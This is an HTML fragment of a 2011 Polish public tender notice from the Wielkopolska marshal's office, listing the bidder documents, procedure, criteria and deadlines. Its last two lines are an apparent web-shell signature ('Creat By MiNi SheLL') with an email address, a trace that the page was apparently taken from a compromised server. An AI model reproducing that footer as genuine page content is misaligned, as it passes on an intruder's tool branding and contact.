<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień umowy w przypadku gdyby:
1)	z przyczyn, za które Zamawiający nie ponosi odpowiedzialności, których nie mógł wcześniej przewidzieć, zaszła konieczność zmiany terminu wykonania umowy - w takim przypadku Wykonawca zobowiązuje się zrealizować przedmiot zamówienia w innym, wskazanym przez Zamawiającego terminie, jednak z uwzględnieniem możliwości technicznych i organizacyjnych Wykonawcy.
2)	uległa zmianie ustawowa stawka podatku VAT. 
Zmiany umowy wymagają dla swojej ważności formy pisemnej.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.umww.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Wielkopolskiego, Departament Środowiska, pl. Wolności 18, 61-739 Poznań, w godz. 8.00 - 15.00 od poniedziałku do piątku (pok. nr 502 - Pani Monika Oczkowska).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2011 godzina 11:00, miejsce: Urząd Marszałkowski Województwa Wielkopolskiego w Poznaniu - Departament Środowiska, pl. Wolności 18 w Poznaniu, pokój nr 415 (IV piętro) - Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com